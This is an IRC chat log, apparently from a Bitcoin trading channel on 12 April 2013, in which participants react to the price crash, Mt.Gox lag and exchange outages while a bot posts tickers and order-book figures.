BTC [-] Apr 12 14:29:11 [BTCTC] [ASICMINER-PT] 4 @ 0.759 = 3.036 BTC [+] Apr 12 14:33:41 https://status.bitfloor.com/ Apr 12 14:34:53 bifloor, please keep in mind that most of the community today is filled with speculators that dont give a fuck, and also there are plenty of entities that actually want bitcoin to fail. Get your security house in order! Apr 12 14:35:44 there are still 0 whales on the bids book and plenty on the asks Apr 12 14:36:11 has anybody actually seen tiberiusiv and EskimoBob together at the same time? Apr 12 14:36:37 i really wonder if the bid whales really chose to wait it out while holding so much btc at risk Apr 12 14:36:57 why would they do that. maybe they have way more in fiat Apr 12 14:38:57 good point Apr 12 14:42:24 50 will be the magic number Apr 12 14:42:36 wrong window Apr 12 14:42:41 i love how the 111111 btc addr has become a bilboard for others to send 0.001 btc to have their own scam advertised http://blockchain.info/address/1933phfhK3ZgFQNLGSDXvqCn32k2buXY8a Apr 12 14:45:33 morning all - what is consensus on gox's "new server" was lag any better overnight? Apr 12 14:46:25 lag has been in the 0 to 8 second range for the past 20 min or so Apr 12 14:46:39 but tehn again, probably not as much volume or Apr 12 14:47:00 i saw 30 seconds Apr 12 14:47:05 just 15 min ago Apr 12 14:47:39 pgp: did you test the data? i emailed you the link, wanna see if it'll work right out of the box on your machine Apr 12 14:47:59 well, i get the feeling that volume will start to pick up as it continues to drift lower here... Apr 12 14:48:13 crazy action last night, though... Apr 12 14:48:17 well, cnbc reported $65...it was at 80 at the time Apr 12 14:50:30 wall at 76 is going to disappear fast imho Apr 12 14:50:49 gone Apr 12 14:51:36 bids getting hosed Apr 12 14:52:58 in before another cooldown Apr 12 14:53:32 get back into the bunker, boys... Apr 12 14:53:49 buy @ $32 Apr 12 14:54:16 i feel so bad for everyone who bought 200+ Apr 12 14:54:20 or even 100+ Apr 12 14:54:34 btce chat full with sob stories of people who are now broke Apr 12 14:54:42 lol Apr 12 14:54:52 i dun feel bad Apr 12 14:55:12 taub: it was their fault, not your Apr 12 14:55:18 taub: they simple were too greedy. Apr 12 14:55:27 i know, i still feel bad for them :) Apr 12 14:55:32 greed fuels a purchase at $200+ for a financial instrument that rose so quickly Apr 12 14:56:17 its going down to $32? damn Apr 12 14:56:19 heh Apr 12 14:56:29 tulips, baby, tulips... Apr 12 14:56:52 i got buy orders along the way Apr 12 14:56:53 :) Apr 12 14:57:21 definately going below 50 today, i think... Apr 12 14:57:22 if you redraw the six month chart...and connect this point to the prior 6 months, it looks like a nice steady growth Apr 12 14:57:35 mjr: yes Apr 12 14:58:04 [BTCTC] [ASICMINER-PT] 25 @ 0.759 = 18.975 BTC [+] Apr 12 14:58:04 all those huge sell orders, thenn the cute 1btc buy inbetween lol Apr 12 14:58:12 [BTCTC] [ASICMINER-PT] 18 @ 0.759 = 13.662 BTC [+] Apr 12 14:58:12 so, gox *seems* better, no? Apr 12 14:58:16 pop pop watching prices drop Apr 12 14:58:21 yea it lags consideribly less Apr 12 14:58:54 70 going going... Apr 12 14:59:04 about 2k+ coins dumped on 70 just now Apr 12 14:59:17 gone Apr 12 14:59:19 [BTCTC] [ASICMINER-PT] 1 @ 0.7605 BTC [+] Apr 12 15:00:03 [BTCTC] [ASICMINER-PT] 1 @ 0.7609 BTC [+] Apr 12 15:00:12 i think that they've improved lag by an order of magnitude it seems to me... that was a lot of coin that just went off Apr 12 15:00:15 [BTCTC] [ASICMINER-PT] 1 @ 0.7609 BTC [+] Apr 12 15:00:26 normally we'd be at 500 sec lag or more Apr 12 15:00:32 yep Apr 12 15:00:34 ;;goxlag Apr 12 15:00:34 MtGox lag is 35.184033 seconds. During this time, light travels 0.0705084081919 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one week (0.0689 AU). Apr 12 15:00:36 so $32 is not going to happen? Apr 12 15:00:45 (13:54:29) MagicalTux: [20:53:00] MagicalTux: have someone give a road plan for how the issues with dos via small orders is going to be dealt with in the long term <- new trade engine won't have any issue handling that Apr 12 15:00:54 it'll happen Apr 12 15:01:05 first stop 50 Apr 12 15:01:14 damn when will we see the bottom Apr 12 15:01:23 (13:55:28) gesell: MagicalTux: do you guys recalculate the fee bracket after every single trade? If so I would recommend tampering this somehow because thats added computation that could be leveraged in a direct dos (small orders) Apr 12 15:01:24 (13:57:25) MagicalTux: gesell: we're already throtteling Apr 12 15:01:43 the graphs tell me steady, healthy increase like mjr said but not tulip Apr 12 15:02:09 joking about the tulips... Apr 12 15:02:15 lol ok Apr 12 15:03:21 good thing about drops like this if that it soes flush out the noobs and puts coins back into strong hands (i hope) Apr 12 15:03:32 mjr_ this type of analysis doesnt apply here sadly because much of the crash is simply from technical glitches Apr 12 15:04:58 lol at the ticker Apr 12 15:05:01 ;;ticker Apr 12 15:05:01 BTCUSD ticker | Best bid: 67.00000, Best ask: 67.20000, Bid-ask spread: 0.20000, Last trade: 67.00000, 24 hour volume: 280761.33688409, 24 hour low: 65.00000, 24 hour high: 163.44100, 24 hour vwap: 94.84470 Apr 12 15:05:16 will be get back to 20? Apr 12 15:05:22 ;;bids 0 Apr 12 15:05:22 There are currently 46813366 bitcoins demanded at or over 0.0 USD, worth 9022428.38588 USD in total. | Data vintage: 77.6342 seconds Apr 12 15:05:42 ChaangNoi: I predicted $50 before $500 Apr 12 15:05:52 I guess its coming out that Im right Apr 12 15:06:06 if you made that call at $45 good job :) Apr 12 15:06:11 I was talking to a VC the other night ($230) who was bragging about *almost* being a bitcoin millionaire - bought in around 85 - I'll bet he feels like a douche bag now Apr 12 15:06:26 ChaangNoi: well Ive been saying it since we started heading up to $100 the first time Apr 12 15:06:31 anyone heard of this? : http://primeasic.com/index.html Apr 12 15:06:35 wow everyone i talk to is always totaly right with their market predictions, everyone must be rich Apr 12 15:06:35 whats funny is- i'm way better off than I was when the price was this low last time lol Apr 12 15:06:43 ChaangNoi: I think mp was agreeing with me at the time too Apr 12 15:06:47 lol yeah calling $50 before $500 when at $20 is a pretty safe call Apr 12 15:07:48 pigeons i thought we would get close to $500. i was wrong, but i still slowly sold a few percent ever $50 so im fine for a few years of living in fiat Apr 12 15:08:11 alex12: looks like scam to me Apr 12 15:08:26 still if anyone told you that at jan 1st we would be at $60 in april would you have belived them? :) Apr 12 15:08:37 prime asic is a scam lol Apr 12 15:08:39 pgp: picks look interested ... Apr 12 15:08:44 s/ed/ing/ Apr 12 15:08:50 yeah ... Apr 12 15:08:54 lol Apr 12 15:08:58 i have more btc than i did 2 days ago, and thats what counts to me Apr 12 15:09:09 pigeons: agreed Apr 12 15:09:51 i was all in btc before the rally Apr 12 15:09:55 ;;ticker --last Apr 12 15:09:56 66.00000 Apr 12 15:10:01 is asicminet.pt mining yet? Apr 12 15:10:01 i had no more fiat left Apr 12 15:10:02 bitcoin-24 down Apr 12 15:10:16 i was selling my limited gold.silver to live Apr 12 15:10:32 ChaangNoi: btw, no, I was saying we'd drop to $50 before we'd go to $500 Apr 12 15:10:36 i can now last foe 2 more years, sad to admit it, but i did sel btc Apr 12 15:10:39 ChaangNoi: and I kept saying it the higher we went Apr 12 15:10:44 I never expected we'd reach $26x Apr 12 15:10:51 d3 im just messing with ya:) Apr 12 15:10:51 yeah i sell btc too when i need to buy something Apr 12 15:11:03 got a family to support Apr 12 15:11:42 but we are yet to hit 50, we might not make it, will be interesting next week Apr 12 15:12:05 the thing is, buying at $60 is so much better than buying at $260, and i sold at $260... Apr 12 15:12:26 rofl Apr 12 15:12:28 that's the way to do it :) Apr 12 15:12:29 bitcoinity Apr 12 15:12:38 dancing chicken with caption "I REGRET NOTHING" Apr 12 15:12:39 lol at chicken on bitcoinity Apr 12 15:12:44 funny Apr 12 15:13:03 he does some entaining stuff with the site Apr 12 15:13:09 entertaining Apr 12 15:13:10 yeah, i like it a lot Apr 12 15:13:33 5k wall at 65 Apr 12 15:13:45 you ever see the big picture of his face smiling at you with the bitcoin address under it... Apr 12 15:13:59 nope Apr 12 15:14:15 i was the first to donate to him Apr 12 15:14:25 he has the address on the lower right Apr 12 15:15:05 it's the best site of it's kind... Apr 12 15:15:39 and most of the time it works Apr 12 15:16:24 lol there goes 65 Apr 12 15:16:45 did someone sell into that wall? Apr 12 15:17:04 interesting that there really aren't any ask walls... it's just a ton of market sell orders Apr 12 15:17:12 unrelenting Apr 12 15:17:34 yeah Apr 12 15:17:42 kinda wonder if it was pump and dump all along Apr 12 15:18:10 and nice to see happen in plain old slow motion... instead of slow, slow, super slow motion... Apr 12 15:18:11 someone just bought a massive amount at 65 Apr 12 15:18:36 conspiracy theory are already circulating... Apr 12 15:18:50 mjr - what were you saying last night about this? Apr 12 15:20:23 [MPEX] [S.MPOE] 10150 @ 0.00069424 = 7.0465 BTC [-] Apr 12 15:20:49 im honestly shocked people have this many coins to sell Apr 12 15:22:24 ;;asks 50 Apr 12 15:22:24 There are currently 0 bitcoins offered at or under 50.0 USD, worth 0.0 USD in total. | Data vintage: 1.2933 seconds Apr 12 15:22:27 maybe these guys are selling: http://www.huffingtonpost.com/2013/04/11/winklevoss-bitcoin_n_3063831.html Apr 12 15:22:28 ;;bids 50 Apr 12 15:22:29 There are currently 30010.715 bitcoins demanded at or over 50.0 USD, worth 1648930.43267 USD in total. | Data vintage: 5.7436 seconds Apr 12 15:22:35 pgp doubt it Apr 12 15:22:51 ;;bids 50.0001 Apr 12 15:22:52 There are currently 22950.793 bitcoins demanded at or over 50.0001 USD, worth 1295934.3161 USD in total. | Data vintage: 27.9335 seconds Apr 12 15:23:11 pgp: huh? Apr 12 15:23:41 i liked the insanity wolf image macro Apr 12 15:23:44 mjr - what you were saying last night about orchestrated selling Apr 12 15:23:52 my bitcoinity now shows a low of 60? wtf? Apr 12 15:23:58 yep Apr 12 15:23:59 massive dumps and goxlag Apr 12 15:24:05 60 gone Apr 12 15:24:08 http://www.quickmeme.com/meme/3tsbo3/ Apr 12 15:24:15 there goes the neighborhood Apr 12 15:24:21 almost time to buy :) Apr 12 15:24:36 ;;bc,24hprc Apr 12 15:24:38 89.99 Apr 12 15:24:39 http://www.youtube.com/watch?feature=player_embedded&v=sFhgfA1G2Uw Apr 12 15:25:53 ;;ticker Apr 12 15:25:54 BTCUSD ticker | Best bid: 57.12120, Best ask: 58.00000, Bid-ask spread: 0.87880, Last trade: 57.12120, 24 hour volume: 313449.17648717, 24 hour low: 58.00000, 24 hour high: 158.27517, 24 hour vwap: 91.00931 Apr 12 15:25:58 pigeons - funny! Apr 12 15:29:00 i wonder what going on with the exante folks right now... Apr 12 15:33:11 ;;bids 0 Apr 12 15:33:11 There are currently 46973788 bitcoins demanded at or over 0.0 USD, worth 7417988.25877 USD in total. | Data vintage: 72.1237 seconds Apr 12 15:33:23 pgp: getting lots of free BJ's from max keiser Apr 12 15:33:26 im sure Apr 12 15:33:33 lol Apr 12 15:33:34 lol Apr 12 15:34:02 short at 56.30 :) Apr 12 15:34:19 a lot of coin sold in last half hour Apr 12 15:34:28 80k? Apr 12 15:34:44 yeah, insane Apr 12 15:35:06 gonna stop at 56? Apr 12 15:35:15 no $30? lol anyone seen the order books Apr 12 15:35:26 64 again lol Apr 12 15:35:46 these guys can only sell so many coins, they cant naked short like they do with silver Apr 12 15:36:54 [MPEX] [O.USD.P089T] 1 @ 1.50413736 BTC [+] Apr 12 15:37:38 can't go *straight* down... but these feels like a dead cat bounce... the guys bying 80 an hour ago will take the opportunity to sell... Apr 12 15:37:42 we think we should not be angry at gox, but instead be thanking it Apr 12 15:37:51 for allowing natural selection to continue Apr 12 15:38:06 [MPEX] [O.USD.P089T] 5 @ 1.78 = 8.9 BTC [+] Apr 12 15:38:19 lol Apr 12 15:38:35 social darwinism at its best Apr 12 15:39:39 problem with crashes is that at so many points along the way, it looks like a buy, but it's not... Apr 12 15:40:18 ;;goxlag Apr 12 15:40:23 lollll Apr 12 15:40:24 aaand it's dead Apr 12 15:40:24 lol yeah, poor bugpowder, bought all the way down... :( Apr 12 15:40:27 again Apr 12 15:41:00 Error: Problem retrieving gox lag. Try again later. Apr 12 15:41:21 ^^ lol Apr 12 15:41:27 new 50x machine is so fast it accidentally traded with the future causing a casuality violation Apr 12 15:41:54 causality* Apr 12 15:42:01 lol Apr 12 15:42:30 does thatmean the coins evaporate? Apr 12 15:43:03 I think they turn in Magic: the gathering playing cards... Apr 12 15:43:12 when is asicminer.pt going to kick in with thier asic's? Apr 12 15:43:33 10TH/d s ++ is what im reading - this true? Apr 12 15:43:48 10TH/s ++ Apr 12 15:44:22 lag is over 200 seconds now Apr 12 15:44:23 ;;goxloag Apr 12 15:44:24 Error: "goxloag" is not a valid command. Apr 12 15:44:27 ;;goxlag Apr 12 15:44:34 gox'd Apr 12 15:44:36 wow - gox is dead in the water - again... Apr 12 15:44:39 ;;goxlaglag Apr 12 15:44:40 Error: "goxlaglag" is not a valid command. Apr 12 15:44:44 LOL Apr 12 15:44:50 sure it's not gribble Apr 12 15:46:21 looks like we have to russian again for price discovery... Apr 12 15:46:23 ;;seen smickles Apr 12 15:46:23 smickles was last seen in #bitcoin-assets 1 week, 0 days, 21 hours, 3 minutes, and 48 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 12 15:46:28 Error: Problem retrieving gox lag. Try again later. Apr 12 15:47:18 ;;gribble wtf man Apr 12 15:47:18 yes I am gribble. why do you keep bothering me? Apr 12 15:47:23 sorry Apr 12 15:47:26 back to the trollbox everyone Apr 12 15:49:50 ;;ticker Apr 12 15:49:51 BTCUSD ticker | Best bid: 67.00001, Best ask: 69.00000, Bid-ask spread: 1.99999, Last trade: 67.00001, 24 hour volume: 329726.38134032, 24 hour low: 54.25000, 24 hour high: 149.00000, 24 hour vwap: 88.67769 Apr 12 15:50:42 70 Apr 12 15:50:55 ;;help Apr 12 15:50:56 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Apr 12 15:51:01 !help Apr 12 15:51:02 List of commands: Apr 12 15:51:03 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} Apr 12 15:51:04 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} Apr 12 15:51:05 !mp (desc: returns the response from MPEX order) Apr 12 15:51:06 !rules (desc: chan guidelines) {short: !r} Apr 12 15:51:07 !exchanges (desc: lists exchanges and brokers) {short: !e} Apr 12 15:51:10 uh oh Apr 12 15:51:11 lol Apr 12 15:52:40 Am is back up, to normal price nice Apr 12 15:54:44 btc = 78 Apr 12 15:54:50 what acrazy roller coaster Apr 12 15:56:21 going up on light volume - just wait Apr 12 15:57:26 [BTCTC] [ASICMINER-PT] 1 @ 0.7252 BTC [-] Apr 12 15:57:29 [BTCTC] [ASICMINER-PT] 1 @ 0.7251 BTC [-] Apr 12 15:57:35 [BTCTC] [ASICMINER-PT] 1 @ 0.725 BTC [-] Apr 12 15:57:42 [BTCTC] [ASICMINER-PT] 1 @ 0.721 BTC [-] Apr 12 15:57:45 [BTCTC] [ASICMINER-PT] 1 @ 0.7201 BTC [-] Apr 12 15:57:48 [BTCTC] [ASICMINER-PT] 3 @ 0.72 = 2.16 BTC [-] Apr 12 15:57:51 [BTCTC] [ASICMINER-PT] 3 @ 0.71 = 2.13 BTC [-] Apr 12 15:58:12 will be interesting to see it eat the wall at 80, was 5k Apr 12 15:58:56 i agree that would be convincing... Apr 12 15:59:08 still think more selling to come Apr 12 15:59:17 [BTCTC] [ASICMINER-PT] 1 @ 0.70111 BTC [-] Apr 12 16:00:33 what no more put options available?! :) Apr 12 16:00:52 i'm with you pgp Apr 12 16:02:03 [HAVELOCK] [SDICE] 1 @ 0.36599939 BTC [+] Apr 12 16:02:30 ;;bids 60 Apr 12 16:02:31 There are currently 11347.452 bitcoins demanded at or over 60.0 USD, worth 692876.202568 USD in total. | Data vintage: 0.0033 seconds Apr 12 16:02:41 ;;asks 60 Apr 12 16:02:42 There are currently 0 bitcoins offered at or under 60.0 USD, worth 0.0 USD in total. | Data vintage: 10.2119 seconds Apr 12 16:02:52 huh Apr 12 16:03:56 rope a dope Apr 12 16:05:03 [HAVELOCK] [SDICE] 1 @ 0.36599939 BTC [+] Apr 12 16:07:02 [HAVELOCK] [VTX] 2 @ 0.397 = 0.794 BTC [+] Apr 12 16:10:59 bitfinex can be lame Apr 12 16:11:02 their book is so thin Apr 12 16:11:11 that when they all of a sudden announce "no gox routing" Apr 12 16:11:19 [MPEX] [S.MPOE] 180 @ 0.00069963 = 0.1259 BTC [+] Apr 12 16:11:19 your position changes dramatically Apr 12 16:12:10 you accually use that site ? Apr 12 16:13:19 ;;nethash Apr 12 16:13:20 66225.2957147 Apr 12 16:16:55 ;;estimate Apr 12 16:16:56 Next difficulty estimate | 9061123.52326 based on data since last change | 9251425.76873 based on data for last three days Apr 12 16:18:08 wonder whats going in miners world Apr 12 16:19:15 lets hope the keep it together Apr 12 16:19:19 and stick with the plan Apr 12 16:19:22 minin errday Apr 12 16:19:39 mining is a foundation factor in btc price Apr 12 16:21:14 yeah Apr 12 16:21:22 but the price is changing profitability numbers Apr 12 16:21:33 and exchanges fucking up is hurting their liquidity Apr 12 16:22:22 There are currently 7586.0915 bitcoins offered at or under 80.0 USD, worth 574725.436367 USD in total. | Data vintage: 243.1423 seconds Apr 12 16:22:26 gox dead? Apr 12 16:23:04 ya Apr 12 16:23:27 back Apr 12 16:25:29 meanwhile people still betting away at sdice Apr 12 16:28:34 lol Apr 12 16:28:47 lol Apr 12 16:29:00 tiberiusiv, where will the price stabilize? Apr 12 16:29:19 not here Apr 12 16:29:27 in Japan? Apr 12 16:29:48 bitfloor looks like it's down again... Apr 12 16:29:53 Strap your seatbelts, we're going down again, sell off Apr 12 16:30:16 yep Apr 12 16:31:22 lipppppPOP Apr 12 16:31:43 wow all exchanges down Apr 12 16:31:45 ;;gribble where will the price stabilize? Apr 12 16:31:45 yes I am gribble. why do you keep bothering me? Apr 12 16:31:55 hasnt had his coffee yet? Apr 12 16:32:24 :-\ Apr 12 16:32:26 depends when he started buying Apr 12 16:32:29 he prob dyde Apr 12 16:33:20 well at worst, he's probably fucked himself on 3 or 4 paychecks only Apr 12 16:33:33 considering timeframes and where price is Apr 12 16:34:16 my last major buy in was at $30 so i'm ok with prices being where they're at Apr 12 16:34:33 my target was ~$70 Apr 12 16:34:46 then everyone got crazy Apr 12 16:35:18 i did sell a bit at $140 and again at $240, so at this point i could have it drop to 0 and not care Apr 12 16:37:14 party is over Apr 12 16:37:26 surprised it's stabilising at ~70 Apr 12 16:40:10 ;;seen jurov Apr 12 16:40:11 jurov was last seen in #bitcoin-assets 2 hours, 18 minutes, and 50 seconds ago: no help there, i guess Apr 12 16:40:55 so Apr 12 16:41:03 if there are no bids, the price must rise or drop? Apr 12 16:41:26 ;;ticker Apr 12 16:41:27 BTCUSD ticker | Best bid: 69.97336, Best ask: 70.00000, Bid-ask spread: 0.02664, Last trade: 70.00000, 24 hour volume: 336060.23220623, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 85.28347 Apr 12 16:41:28 that's what I thought too, but I've seen weirder between yesterday and today Apr 12 16:41:49 There are currently 16889.34 bitcoins offered at or under 100.0 USD, worth 1435165.93254 USD in total. | Data vintage: 0.0031 seconds Apr 12 16:42:00 There are currently 34051.827 bitcoins demanded at or over 50.0 USD, worth 1939351.7359 USD in total. | Data vintage: 11.6362 seconds Apr 12 16:42:22 ;;goxlag Apr 12 16:42:24 MtGox lag is 60.589218 seconds. During this time, light travels 0.121420114481 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 12 16:42:36 gox is lagged, that means price will drop Apr 12 16:42:38 lol Apr 12 16:45:04 it's gearing up for a drop right now Apr 12 16:45:20 would you agree tiberius? Apr 12 16:45:55 hehe Apr 12 16:46:22 ;;asks 67 Apr 12 16:46:25 There are currently 0 bitcoins offered at or under 67.0 USD, worth 0.0 USD in total. | Data vintage: 0.0025 seconds Apr 12 16:51:25 [MPEX] [S.MPOE] 7000 @ 0.00069424 = 4.8597 BTC [-] Apr 12 17:00:57 [BTCTC] [ASICMINER-PT] 1 @ 0.7549 BTC [+] Apr 12 17:01:26 ;;seen mod6 Apr 12 17:01:27 mod6 was last seen in #bitcoin-assets 10 hours, 27 minutes, and 15 seconds ago: http://youtu.be/wzQM-tLIz9M << music my gf humms to me when i tell her that gox has gone down Apr 12 17:01:41 heh, btc-e is using cloudflare now Apr 12 17:01:41 ;;goxlag Apr 12 17:01:42 MtGox lag is 1.256375 seconds. During this time, light travels 0.00251776143292 AU. You could have sent a bitcoin from Earth to Moon (0.00257 AU). Apr 12 17:02:07 All cheap coins just got bought up Apr 12 17:02:13 Boooo Apr 12 17:02:45 now would be a great time for someone to click the Buy $1m button a few times Apr 12 17:03:21 downtrend finally broke Apr 12 17:03:57 Does anyone still do business with smickles? Apr 12 17:04:03 ;;seeb smickles Apr 12 17:04:04 Error: "seeb" is not a valid command. Apr 12 17:04:12 ;;seen smickles Apr 12 17:04:13 smickles was last seen in #bitcoin-assets 1 week, 0 days, 22 hours, 21 minutes, and 38 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 12 17:04:17 i dont even know what business he does Apr 12 17:04:20 :O Apr 12 17:04:37 ;;last Apr 12 17:04:38 [08:04:18] :O Apr 12 17:04:44 when all the ASIC's land from avalon, what would the expected difficulty be? Apr 12 17:05:05 ask BCB, i told him to keep shining a crystal ball Apr 12 17:05:35 alex12: avalon hash power * amount of avalons + current hashrate. Apr 12 17:05:44 :( he is a broker but sometimes takes unexpected leave. He is probably profiting on the volatility. Apr 12 17:05:55 But I am locked from my account. Apr 12 17:05:58 Lol Apr 12 17:06:17 ;;ticker Apr 12 17:06:18 BTCUSD ticker | Best bid: 81.60000, Best ask: 82.00000, Bid-ask spread: 0.40000, Last trade: 81.60000, 24 hour volume: 344493.53429010, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 84.08093 Apr 12 17:06:35 ;;asks 83 Apr 12 17:06:36 There are currently 2212.4906 bitcoins offered at or under 83.0 USD, worth 178085.831235 USD in total. | Data vintage: 110.5263 seconds Apr 12 17:06:46 ;;bids 80 Apr 12 17:06:49 There are currently 116.80199 bitcoins demanded at or over 80.0 USD, worth 9344.15952 USD in total. | Data vintage: 0.0071 seconds Apr 12 17:08:46 ;;ticker Apr 12 17:08:47 BTCUSD ticker | Best bid: 80.00000, Best ask: 80.50000, Bid-ask spread: 0.50000, Last trade: 80.00000, 24 hour volume: 345297.93796984, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.99958 Apr 12 17:09:08 ;;ticker Apr 12 17:09:09 BTCUSD ticker | Best bid: 80.00000, Best ask: 80.63032, Bid-ask spread: 0.63032, Last trade: 80.63032, 24 hour volume: 345297.93796984, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 83.99958 Apr 12 17:09:57 thestringdude, maybe you're using wrong broker then :P Apr 12 17:09:59 There are currently 9890.3521 bitcoins offered at or under 100.0 USD, worth 918182.560604 USD in total. | Data vintage: 0.0026 seconds Apr 12 17:11:26 Am I jurov? As I recall you charge 1.3 btc a year :P i guess in consideration, that = 1 mpex account in about 20 years Apr 12 17:11:37 Okay perhaps we shall talk soon. Apr 12 17:11:49 :P Apr 12 17:12:24 !ticker m ^OIX Apr 12 17:12:25 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 123.90251552 / 218.88143499 / 226.22012381 (14550 shares, 2,478.62 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 12 17:12:33 The bulls will wake up soon Apr 12 17:12:45 Damn. Apr 12 17:13:10 smickles cyprus'ed me Apr 12 17:14:01 !ticker m s.mpoe Apr 12 17:14:03 [MPEX:S.MPOE] 1D: 0.00067363 / 0.00069461 / 0.00071795 (397326 shares, 275.99 BTC), 7D: 0.00063322 / 0.00068844 / 0.00071795 (1922595 shares, 1,323.61 BTC), 30D: 0.00059218 / 0.00068816 / 0.00077505 (9962088 shares, 6,855.60 BTC) Apr 12 17:14:20 [BTCTC] [S.DICE-PT] 11 @ 0.00386 = 0.0425 BTC [+] Apr 12 17:14:25 !ticker h him Apr 12 17:14:26 lol dunno how much mircea will be asking in 20 years Apr 12 17:14:28 [HAVELOCK:HIM] 1D: 1.20000000 / 1.3574 / 1.65000000 (50 shares, 67.87000000 BTC), 7D: 0.75000001 / 1.46804495 / 1.93000000 (287 shares, 421.32890011 BTC), 30D: 0.75000001 / 1.73321281 / 2.08000000 (812 shares, 1407.36880041 BTC) Apr 12 17:14:38 Exactlt Apr 12 17:14:49 Which is why we will talk Apr 12 17:14:55 ;;getrating jurov Apr 12 17:14:55 WARNING: Currently not authenticated. User jurov, rated since Fri Jan 20 16:16:32 2012. Cumulative rating 14, from 16 total ratings. Received ratings: 15 positive, 1 negative. Sent ratings: 10 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=jurov Apr 12 17:15:48 Why is there no message for smickles rating of you? Apr 12 17:15:50 um, i should prolly ask rating on every withdrawal like mp does Apr 12 17:16:03 oh, he was out of words Apr 12 17:16:14 Yeah your withdrawal fees are too high Apr 12 17:16:22 .01 da fuuuuuq? Apr 12 17:16:44 My roaming ATM charges less :P Apr 12 17:16:47 it's not wallet, ya know Apr 12 17:16:50 nor atm Apr 12 17:17:02 string, why not get your own account? Apr 12 17:17:08 But also .01 transfer yo Apr 12 17:17:17 I was working on that Apr 12 17:17:24 ive been in this chan for like 4 mos, and smickles was absent most of it Apr 12 17:17:24 Usagi owes me 18 coin Apr 12 17:17:53 Smickles has 3.71 of it paid out plus another 10 Apr 12 17:18:06 guy seems great, but i dunno why youd want a broker that was rarely around Apr 12 17:18:12 lol Apr 12 17:18:29 He used to be around all the time Apr 12 17:18:44 how many mos need to pass for you to change your outlook? Apr 12 17:18:57 he hasnt even had his baby yet Apr 12 17:19:09 Sends monthly statements and was around to capture options instantly like Bugpowder sometimes does for me. Apr 12 17:19:10 sry i dont mean to berate you Apr 12 17:19:16 just feel bad Apr 12 17:19:23 Um he is highly rated. Apr 12 17:19:36 Its just he has been playing too much kerbal space program... Apr 12 17:19:38 i didnt argue that Apr 12 17:19:58 Its as addictive as btc Apr 12 17:20:42 btc is more adictive than any game i ever got stuck on, so i'm not even gonna google kerbal Apr 12 17:20:43 hehe Apr 12 17:20:46 jurov's wd fee is 0.1 BTC, no? Not the end of the world as I agree it's not a wallet, not meant for penny (er, satoshi) pinching arb trades. Apr 12 17:21:10 Addictive as hell, agreed Apr 12 17:21:13 yes 0.1 Apr 12 17:22:22 Do you have minimum account sizes? I guess not since a user can 0 the account to put it on hold. Apr 12 17:22:54 only on beginning you have to deposit 1 BTC, after that you can have anything you like there Apr 12 17:23:03 [HAVELOCK] [VTX] 1 @ 0.397 BTC [+] Apr 12 17:23:15 what happens if there is no btc when fees are levied? Apr 12 17:23:24 negative balance? Apr 12 17:23:25 but if you keep negative balance too long (due to monthly fee) then we'll have to resolve it somehow Apr 12 17:23:26 [BTCTC] [S.DICE-PT] 5 @ 0.00386 = 0.0193 BTC [+] Apr 12 17:23:30 cool Apr 12 17:24:58 Lol is that a reference to me :( Apr 12 17:25:17 !ticker m s.dice Apr 12 17:25:19 [MPEX:S.DICE] 1D: 0.0027 / 0.00320359 / 0.00373333 (72712 shares, 232.94 BTC), 7D: 0.0027 / 0.00293113 / 0.00373333 (283173 shares, 830.02 BTC), 30D: 0.0027 / 0.00348895 / 0.00599987 (1833964 shares, 6,398.61 BTC) Apr 12 17:25:38 !ticker h him Apr 12 17:25:39 [HAVELOCK:HIM] 1D: 1.20000000 / 1.3574 / 1.65000000 (50 shares, 67.87000000 BTC), 7D: 0.75000001 / 1.46488035 / 1.93000000 (285 shares, 417.49090011 BTC), 30D: 0.75000001 / 1.73321281 / 2.08000000 (812 shares, 1407.36880041 BTC) Apr 12 17:26:25 ;;bc,24hprc Apr 12 17:26:26 81.91 Apr 12 17:33:10 [BTCTC] [BTC-BOND] 1 @ 0.01019 BTC [+] Apr 12 17:34:14 [MPEX] [S.MPOE] 5200 @ 0.00069424 = 3.61 BTC [-] Apr 12 17:34:26 question about mpex listings on website Apr 12 17:34:39 by the options, there are cells Apr 12 17:34:49 the first ones show current asks/bids Apr 12 17:34:58 the next colum shows las price Apr 12 17:35:17 .01 sales flooding the orderbook, lagging and bringing the price down ;-) Apr 12 17:35:18 3rd column is? Apr 12 17:35:50 ThickAsThieves: it says at the top... Apr 12 17:36:03 right Apr 12 17:36:07 but is it weighted Apr 12 17:36:22 or just a strict top and bottom Apr 12 17:36:33 i'm trying to see if there's any way Apr 12 17:36:40 to calculate profit of bonds Apr 12 17:36:46 but i'm thinking no Apr 12 17:37:33 likem looking at O.USD.P200T Apr 12 17:37:48 it shows 1.45892277 as the max Apr 12 17:37:57 then qty 9`375 Apr 12 17:37:59 beside it Apr 12 17:38:26 is that 13677.40096875 btc spent? Apr 12 17:39:24 or just no way to know Apr 12 17:40:27 those puts either lost or made a bunch of btc Apr 12 17:41:02 [HAVELOCK] [VTX] 3 @ 0.39 = 1.17 BTC [-] Apr 12 17:42:01 ThickAsThieves, you don't know the price what these 9`375 were bought or sold for Apr 12 17:42:23 thx Apr 12 17:42:33 and exercises aren't shown publicly at all.. so no guessing possible Apr 12 17:42:42 indeed Apr 12 17:43:02 [HAVELOCK] [VTX] 8 @ 0.38 = 3.04 BTC [-] Apr 12 17:44:33 ;;goxlag Apr 12 17:44:41 gox hosed again? Apr 12 17:44:45 I think so Apr 12 17:44:56 Stuck at stalemate $76.75 Apr 12 17:45:04 can't get to gox website... Apr 12 17:45:07 but isee no reason for it not to drop further into 70's Apr 12 17:45:15 great Apr 12 17:45:16 lower Apr 